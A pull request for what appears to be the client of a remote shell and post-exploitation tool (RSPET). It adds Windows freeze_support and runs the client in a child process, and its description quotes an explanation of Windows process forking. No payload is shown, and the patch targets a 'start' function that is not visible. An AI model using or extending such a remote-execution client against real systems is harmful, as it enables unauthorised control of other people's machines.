### PR TITLE
Todo @2 done.

### DIFF
--- a/Client/RSPET_client.py
+++ b/Client/RSPET_client.py
@@ -7,6 +7,8 @@ from sys import exit as sysexit, argv
 from time import sleep
 from multiprocessing import Process
 from pinject import UDP, IP
+from multiprocessing import Process, freeze_support
+#https://docs.python.org/2/library/multiprocessing.html#multiprocessing.freeze_support
 
 def make_en_STDOUT(STDOUT,sock):
 	en_STDOUT = bytearray(STDOUT,'UTF-8')
@@ -222,5 +224,6 @@ def main():
 	s.close()
 
 #Start Here!
-if __name__ == "__main__":
-	main()
+if __name__ == '__main__':
+    freeze_support()
+    Process(target=start).start()


### PR DESCRIPTION
"Fix logic bug where if a dirrect command's to Host OS execution is perpetual the Server deadlocks", done.

Ref : http://stackoverflow.com/a/18195951

"The reason is lack of fork() on Windows (which is not entirely true). Because of this, on Windows the fork is simulated by creating a new process in which code, which on Linux is being run in child process, is being run. As the code is to be run in technically unrelated process, it has to be delivered there before it can be run. The way it's being delivered is first it's being pickled and then sent through the pipe from the original process to the new one. In addition this new process is being informed it has to run the code passed by pipe, by passing --multiprocessing-fork command line argument to it. If you take a look at implementation of freeze_support() function its task is to check if the process it's being run in is supposed to run code passed by pipe or not."
